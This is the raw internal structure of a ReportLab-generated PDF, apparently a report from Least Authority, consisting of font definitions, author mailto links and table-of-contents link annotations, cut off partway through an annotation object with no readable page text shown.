%PDF-1.4
%???? ReportLab Generated PDF document http://www.reportlab.com
% 'BasicFonts': class PDFDictionary 
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R
 /F2 3 0 R
 /F3 48 0 R
 /F4 138 0 R
 /F5 145 0 R
 /F6 186 0 R
 /F7 187 0 R
 /F8 194 0 R >>
endobj
% 'F1': class PDFType1Font 
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
 /Encoding /WinAnsiEncoding
 /Name /F1
 /Subtype /Type1
 /Type /Font >>
endobj
% 'F2': class PDFType1Font 
3 0 obj
% Font Helvetica-Bold
<< /BaseFont /Helvetica-Bold
 /Encoding /WinAnsiEncoding
 /Name /F2
 /Subtype /Type1
 /Type /Font >>
endobj
% 'Annot.NUMBER1': class PDFDictionary 
4 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (mailto:nathan@LeastAuthority.com) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 181.7729
 689.7736
 308.0929
 701.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER2': class PDFDictionary 
5 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (mailto:zooko@LeastAuthority.com) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 217.5729
 671.7736
 339.9929
 683.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER3': class PDFDictionary 
6 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (mailto:taylor@LeastAuthority.com) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 180.1029
 653.7736
 300.2929
 665.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER4': class PDFDictionary 
7 0 obj
<< /A << /S /URI
 /Type /Action
 /URI (mailto:darius@LeastAuthority.com) >>
 /Border [ 0
 0
 0 ]
 /Rect [ 177.3329
 635.7736
 300.3029
 647.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER5': class LinkAnnotation 
8 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 587.7736
 107.1629
 599.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER6': class LinkAnnotation 
9 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 527.0227
 587.7736
 532.5827
 599.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER7': class LinkAnnotation 
10 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 690.0236
 0 ]
 /Rect [ 82.69291
 569.7736
 153.8229
 581.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER8': class LinkAnnotation 
11 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 690.0236
 0 ]
 /Rect [ 527.0227
 569.7736
 532.5827
 581.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER9': class LinkAnnotation 
12 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 630.0236
 0 ]
 /Rect [ 82.69291
 551.7736
 136.6129
 563.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER10': class LinkAnnotation 
13 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 630.0236
 0 ]
 /Rect [ 527.0227
 551.7736
 532.5827
 563.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER11': class LinkAnnotation 
14 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 570.0236
 0 ]
 /Rect [ 82.69291
 533.7736
 208.8529
 545.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER12': class LinkAnnotation 
15 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 137 0 R
 /XYZ
 62.69291
 570.0236
 0 ]
 /Rect [ 527.0227
 533.7736
 532.5827
 545.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER13': class LinkAnnotation 
16 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 141 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 515.7736
 101.6029
 527.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER14': class LinkAnnotation 
17 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 141 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 527.0227
 515.7736
 532.5827
 527.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER15': class LinkAnnotation 
18 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 141 0 R
 /XYZ
 62.69291
 282.0236
 0 ]
 /Rect [ 82.69291
 497.7736
 243.8829
 509.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER16': class LinkAnnotation 
19 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 141 0 R
 /XYZ
 62.69291
 282.0236
 0 ]
 /Rect [ 527.0227
 497.7736
 532.5827
 509.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER17': class LinkAnnotation 
20 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 479.7736
 108.2629
 491.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER18': class LinkAnnotation 
21 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 527.0227
 479.7736
 532.5827
 491.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER19': class LinkAnnotation 
22 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 624.0236
 0 ]
 /Rect [ 82.69291
 461.7736
 138.2729
 473.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER20': class LinkAnnotation 
23 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 624.0236
 0 ]
 /Rect [ 527.0227
 461.7736
 532.5827
 473.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER21': class LinkAnnotation 
24 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 594.0236
 0 ]
 /Rect [ 102.6929
 443.7736
 141.0329
 455.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER22': class LinkAnnotation 
25 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 594.0236
 0 ]
 /Rect [ 527.0227
 443.7736
 532.5827
 455.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER23': class LinkAnnotation 
26 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 537.0236
 0 ]
 /Rect [ 102.6929
 425.7736
 166.6129
 437.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER24': class LinkAnnotation 
27 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 537.0236
 0 ]
 /Rect [ 527.0227
 425.7736
 532.5827
 437.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER25': class LinkAnnotation 
28 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 121.0236
 0 ]
 /Rect [ 82.69291
 407.7736
 173.8429
 419.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER26': class LinkAnnotation 
29 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 148 0 R
 /XYZ
 62.69291
 121.0236
 0 ]
 /Rect [ 527.0227
 407.7736
 532.5827
 419.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER27': class LinkAnnotation 
30 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 389.7736
 104.3629
 401.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER28': class LinkAnnotation 
31 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 527.0227
 389.7736
 532.5827
 401.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER29': class LinkAnnotation 
32 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Rect [ 82.69291
 371.7736
 144.9329
 383.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER30': class LinkAnnotation 
33 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Rect [ 527.0227
 371.7736
 532.5827
 383.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER31': class LinkAnnotation 
34 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 642.0236
 0 ]
 /Rect [ 102.6929
 353.7736
 161.0429
 365.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER32': class LinkAnnotation 
35 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 150 0 R
 /XYZ
 62.69291
 642.0236
 0 ]
 /Rect [ 527.0227
 353.7736
 532.5827
 365.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER33': class LinkAnnotation 
36 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 153 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 335.7736
 340.0029
 347.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER34': class LinkAnnotation 
37 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 153 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 527.0227
 335.7736
 532.5827
 347.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER35': class LinkAnnotation 
38 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 158 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 317.7736
 417.2829
 329.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER36': class LinkAnnotation 
39 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 158 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 317.7736
 532.5827
 329.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER37': class LinkAnnotation 
40 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 170 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 299.7736
 305.0029
 311.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER38': class LinkAnnotation 
41 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 170 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 299.7736
 532.5827
 311.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER39': class LinkAnnotation 
42 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 176 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 281.7736
 448.3629
 293.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER40': class LinkAnnotation 
43 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 176 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 281.7736
 532.5827
 293.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER41': class LinkAnnotation 
44 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 181 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 263.7736
 422.2729
 275.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER42': class LinkAnnotation 
45 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 181 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 263.7736
 532.5827
 275.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER43': class LinkAnnotation 
46 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 188 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 245.7736
 376.1429
 257.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER44': class LinkAnnotation 
47 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 188 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 245.7736
 532.5827
 257.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'F3': class PDFType1Font 
48 0 obj
% Font Courier
<< /BaseFont /Courier
 /Encoding /WinAnsiEncoding
 /Name /F3
 /Subtype /Type1
 /Type /Font >>
endobj
% 'Annot.NUMBER45': class LinkAnnotation 
49 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 195 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 227.7736
 285.0029
 239.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER46': class LinkAnnotation 
50 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 195 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 285.0029
 227.7736
 405.0029
 239.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER47': class LinkAnnotation 
51 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 195 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 405.0029
 227.7736
 437.7929
 239.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER48': class LinkAnnotation 
52 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 195 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 227.7736
 532.5827
 239.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER49': class LinkAnnotation 
53 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 200 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 209.7736
 434.4729
 221.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER50': class LinkAnnotation 
54 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 200 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 197.7736
 166.6029
 209.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER51': class LinkAnnotation 
55 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 200 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 209.7736
 532.5827
 221.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER52': class LinkAnnotation 
56 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 209 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 179.7736
 253.8729
 191.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER53': class LinkAnnotation 
57 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 209 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 179.7736
 532.5827
 191.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER54': class LinkAnnotation 
58 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 161.7736
 460.0629
 173.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER55': class LinkAnnotation 
59 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 216 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 161.7736
 532.5827
 173.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER56': class LinkAnnotation 
60 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 220 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 143.7736
 310.5529
 155.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER57': class LinkAnnotation 
61 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 220 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 143.7736
 532.5827
 155.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER58': class LinkAnnotation 
62 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 224 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 125.7736
 338.3429
 137.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER59': class LinkAnnotation 
63 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 224 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 125.7736
 532.5827
 137.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER60': class LinkAnnotation 
64 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 227 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 107.7736
 273.8729
 119.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER61': class LinkAnnotation 
65 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 227 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 107.7736
 532.5827
 119.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER62': class LinkAnnotation 
66 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 229 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 89.77362
 264.9829
 101.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER63': class LinkAnnotation 
67 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 229 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 89.77362
 532.5827
 101.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Page1': class PDFPage 
68 0 obj
% Page dictionary
<< /Annots [ 4 0 R
 5 0 R
 6 0 R
 7 0 R
 8 0 R
 9 0 R
 10 0 R
 11 0 R
 12 0 R
 13 0 R
 14 0 R
 15 0 R
 16 0 R
 17 0 R
 18 0 R
 19 0 R
 20 0 R
 21 0 R
 22 0 R
 23 0 R
 24 0 R
 25 0 R
 26 0 R
 27 0 R
 28 0 R
 29 0 R
 30 0 R
 31 0 R
 32 0 R
 33 0 R
 34 0 R
 35 0 R
 36 0 R
 37 0 R
 38 0 R
 39 0 R
 40 0 R
 41 0 R
 42 0 R
 43 0 R
 44 0 R
 45 0 R
 46 0 R
 47 0 R
 49 0 R
 50 0 R
 51 0 R
 52 0 R
 53 0 R
 54 0 R
 55 0 R
 56 0 R
 57 0 R
 58 0 R
 59 0 R
 60 0 R
 61 0 R
 62 0 R
 63 0 R
 64 0 R
 65 0 R
 66 0 R
 67 0 R ]
 /Contents 343 0 R
 /MediaBox [ 0
 0
 595.2756
 841.8898 ]
 /Parent 342 0 R
 /Resources << /Font 1 0 R
 /ProcSet [ /PDF
 /Text
 /ImageB
 /ImageC
 /ImageI ] >>
 /Rotate 0
 /Trans <<  >>
 /Type /Page >>
endobj
% 'Annot.NUMBER64': class LinkAnnotation 
69 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 234 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 750.7736
 267.7529
 762.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER65': class LinkAnnotation 
70 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 234 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 750.7736
 532.5827
 762.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER66': class LinkAnnotation 
71 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 238 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 732.7736
 287.2129
 744.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER67': class LinkAnnotation 
72 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 238 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 732.7736
 532.5827
 744.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER68': class LinkAnnotation 
73 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 239 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 102.6929
 714.7736
 313.3229
 726.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER69': class LinkAnnotation 
74 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 239 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 714.7736
 532.5827
 726.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER70': class LinkAnnotation 
75 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 82.69291
 696.7736
 244.4229
 708.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER71': class LinkAnnotation 
76 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 696.7736
 532.5827
 708.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER72': class LinkAnnotation 
77 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 693.0236
 0 ]
 /Rect [ 102.6929
 678.7736
 175.4929
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER73': class LinkAnnotation 
78 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 693.0236
 0 ]
 /Rect [ 521.4627
 678.7736
 532.5827
 690.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER74': class LinkAnnotation 
79 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 462.0236
 0 ]
 /Rect [ 102.6929
 660.7736
 186.0529
 672.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER75': class LinkAnnotation 
80 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 462.0236
 0 ]
 /Rect [ 521.4627
 660.7736
 532.5827
 672.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER76': class LinkAnnotation 
81 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 363.0236
 0 ]
 /Rect [ 122.6929
 642.7736
 198.2729
 654.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER77': class LinkAnnotation 
82 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 245 0 R
 /XYZ
 62.69291
 363.0236
 0 ]
 /Rect [ 521.4627
 642.7736
 532.5827
 654.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER78': class LinkAnnotation 
83 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 624.7736
 121.5829
 636.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER79': class LinkAnnotation 
84 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 521.4627
 624.7736
 532.5827
 636.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER80': class LinkAnnotation 
85 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Rect [ 82.69291
 606.7736
 192.1829
 618.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER81': class LinkAnnotation 
86 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 732.0236
 0 ]
 /Rect [ 521.4627
 606.7736
 532.5827
 618.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER82': class LinkAnnotation 
87 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 648.0236
 0 ]
 /Rect [ 82.69291
 588.7736
 178.8429
 600.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER83': class LinkAnnotation 
88 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 648.0236
 0 ]
 /Rect [ 521.4627
 588.7736
 532.5827
 600.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER84': class LinkAnnotation 
89 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 564.0236
 0 ]
 /Rect [ 82.69291
 570.7736
 171.0529
 582.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER85': class LinkAnnotation 
90 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 564.0236
 0 ]
 /Rect [ 521.4627
 570.7736
 532.5827
 582.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER86': class LinkAnnotation 
91 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 492.0236
 0 ]
 /Rect [ 82.69291
 552.7736
 209.9729
 564.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER87': class LinkAnnotation 
92 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 253 0 R
 /XYZ
 62.69291
 492.0236
 0 ]
 /Rect [ 521.4627
 552.7736
 532.5827
 564.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER88': class LinkAnnotation 
93 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 260 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
 /Rect [ 62.69291
 534.7736
 169.9229
 546.7736 ]
 /Subtype /Link
 /Type /Annot >>
endobj
% 'Annot.NUMBER89': class LinkAnnotation 
94 0 obj
<< /Border [ 0
 0
 0 ]
 /Contents ()
 /Dest [ 260 0 R
 /XYZ
 62.69291
 765.0236
 0 ]
